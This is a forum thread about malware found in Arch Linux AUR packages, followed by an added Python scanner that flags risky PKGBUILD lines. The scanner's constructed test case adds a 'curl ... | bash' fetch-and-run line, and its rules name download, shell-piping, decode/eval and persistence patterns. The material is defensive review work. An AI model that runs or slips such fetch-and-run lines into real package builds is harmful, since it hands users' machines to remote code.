A tech news platform built with Next.js, providing global tech news and discussions.
Arch Linux AUR Repository Found to Contain Malware

152 points by fdm, almost 7 years ago

16 comments

cmiles74, almost 7 years ago
From the article:

"This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories."

LOL. Why should this only apply to Linux users? We should all be wary of downloading random things from websites.

AUR has always been labeled "user submitted", but I guess it's easy to forget that some "users" are really out to cause harm.
pandasun, almost 7 years ago
The article mentions 3 infected packages. But it only lists one: acroread.

Then the comment section mentions the other one is libvlc.

But the mailing list says this is something different: https://lists.archlinux.org/pipermail/aur-general/2018-July/034158.html

So then there's still two missing.

Here's what I've found that he maintained:

1) balz (https://archive.fo/TjIQI)

2) minergate (https://archive.fo/TjIQI)

3) acroread - as mentioned (https://my.mixtape.moe/kvfpmk.png)

So those "balz" and "minergate" could be the missing two.

Edit: seems like archive.fo is temporarily down, so it will just be my word for it right now. Sorry.
Tharre, almost 7 years ago
For the people interested, here's the actual commit from the acroread package:

https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc
westmeal, almost 7 years ago
Doesn't everyone know AUR packages are inherently unsafe? If you wanted to make sure they weren't up to something, you could read the PKGBUILD.
Aardwolf, almost 7 years ago
Unfortunately lots of things one actually wants are on AUR, things like jpeginfo, golly, steam-fonts, simple-mtpfs, jslint, ...

A case for putting more things in the main Archlinux repositories!
jdlyga, almost 7 years ago
This is exactly what we've been preparing for. Don't use yaourt, and read those diffs. I know a lot of people don't do this, but it's important.
tombert, almost 7 years ago
I mean, is this new information? I always look at the upvotes on the package to see if it has been tested.
arendtio, almost 7 years ago
As an Arch user this has bothered me for a while. On the one hand the AUR contains packages I don't want to miss, on the other hand installing and updating from the AUR is tiresome.

Recently I switched to the AUR helper aurman, which is great, but it still doesn't free you from reviewing PKGBUILD changes. Sometimes I wish there were some kind of review process where popular packages could be labeled as 'reviewed' (e.g. by experienced/trusted Arch users) and an (optional) option within the AUR helpers to accept 'reviewed' packages without presenting the PKGBUILD for review.

I know that wouldn't be perfect either, but at least it would increase the efficiency, and as a user one could focus on the less popular packages where it is unlikely that someone else will find some malware.
jolmg, almost 7 years ago
Is there a public database of Linux malware found in the wild that one can study to know what kind of things to look for when reviewing PKGBUILDs and other open source code?

EDIT: s/repository/public database/
etu, almost 7 years ago
I'm surprised that this hasn't happened a lot earlier, to be honest. It probably has, but hasn't been picked up by someone. It's a user submitted repo with over 44000 packages (source: repology [0]).

It has happened to the snap store recently, but AUR has been around for ages.

[0]: https://repology.org/repository/aur
jancsika, almost 7 years ago
> Following the discovery all dangerous instances were removed and the user account suspended.

I heard they're making a change to the policy for uploading packages to AUR. The next time this happens the user will automatically receive an email that says, "Hey, don't do that."
delbel, almost 7 years ago
I tried installing Arch Linux, and it was harder than installing SunOS 4.3. The instructions were absolutely wrong. I wish I could give it another try, but I just don't have time to experience the wows of the early 90s just to get a browser up.
lerax, almost 7 years ago
Not a surprise.
relyio, almost 7 years ago
I don't know a single Arch Linux user who doesn't check the PKGBUILD of the packages they get from AUR.
sandov, almost 7 years ago
I really hope one day Linux stops using package managers and switches to single-file binary installers as in Windows and Mac. Until that day, I won't feel completely comfortable using Linux.

Package managers are an inherently flawed way to distribute software: instead of obtaining your programs from whoever developed that program, you get it from your OS developer!
chimeracoder, almost 7 years ago
The Arch User Repository hosts whatever people want to upload to it, with basically no proactive vetting whatsoever. In addition, the installation scripts run arbitrary code, a portion of which must run with root privileges. When a package gets orphaned, that means that anybody in the community can take over maintainership of the package.

There's a whole lot of trust that has to go on when installing a package from the AUR - and yes, this is a fundamental problem with the security model of Arch Linux, but that's been known for a very long time.

Honestly, I'd be surprised if this hasn't happened before with orphaned packages.
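Added example, not code from the thread, from Arch or from any AUR helper: a small Python review aid for the "read the PKGBUILD, read the diff" habit that westmeal, jdlyga and arendtio describe, jolmg asks what to look for in, and chimeracoder explains the reason for (build steps run arbitrary code, .install scriptlets run as root). It flags constructs that deserve a second look either in a whole PKGBUILD or only in the lines a new revision adds; the two PKGBUILDs, the hostname and the rule set are constructed for illustration and the rules are heuristics, not a malware detector.

```python
import difflib
import re

# Constructed example PKGBUILDs (not the acroread package from the thread):
# a benign "before" version and an "update" that adds a single extra line.
OLD_PKGBUILD = """\
pkgname=example-tool
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir/example-tool-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
"""
# The "update": a pkgrel bump plus one line that fetches and runs a remote script.
NEW_PKGBUILD = OLD_PKGBUILD.replace("pkgrel=1", "pkgrel=2").replace(
    "/usr/bin/example-tool\"\n", "/usr/bin/example-tool\"\n  curl -s https://example.invalid/x | bash\n")

RULES = [  # (rule id, pattern): each flags something worth a second look, not proof of malice
    ("net-fetch-in-step", re.compile(r"^\s*(curl|wget)\b")),               # download outside source= (no checksum)
    ("pipe-to-shell", re.compile(r"\|\s*(ba|z)?sh\b")),                     # output fed straight into a shell
    ("decode-or-eval", re.compile(r"base64\s+(-d|--decode)\b|\beval\b")),   # obscured code run at build time
    ("persistence-path", re.compile(r"/etc/systemd/system|\.config/autostart|/etc/cron")),  # boot/login hooks
    ("unverified-source", re.compile(r"^\s*\w*sums=\(.*['\"]SKIP['\"]")),   # source content not pinned
    ("install-scriptlet", re.compile(r"^\s*install=\S")),                   # .install runs as root under pacman
]

def scan_lines(lines):
    """Return (line_number, rule_id, stripped_line) for every rule hit, in file order."""
    return [(n, rule_id, line.strip())
            for n, line in enumerate(lines, 1)
            for rule_id, pattern in RULES if pattern.search(line)]

def audit_pkgbuild(text):
    """Full review of one PKGBUILD, e.g. before the first install."""
    return scan_lines(text.splitlines())

def audit_changes(old_text, new_text):
    """Review only lines added since the version already on disk; line numbers index the added lines."""
    diff = difflib.unified_diff(old_text.splitlines(), new_text.splitlines(), lineterm="", n=0)
    added = [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
    return scan_lines(added)

if __name__ == "__main__":
    for n, rule_id, line in audit_changes(OLD_PKGBUILD, NEW_PKGBUILD):
        print(f"added line {n}: [{rule_id}] {line}")
```

The full audit also reports the SKIP checksum that was already present; the diff audit reports only what the update introduced, which is why it is the cheaper habit for routine upgrades.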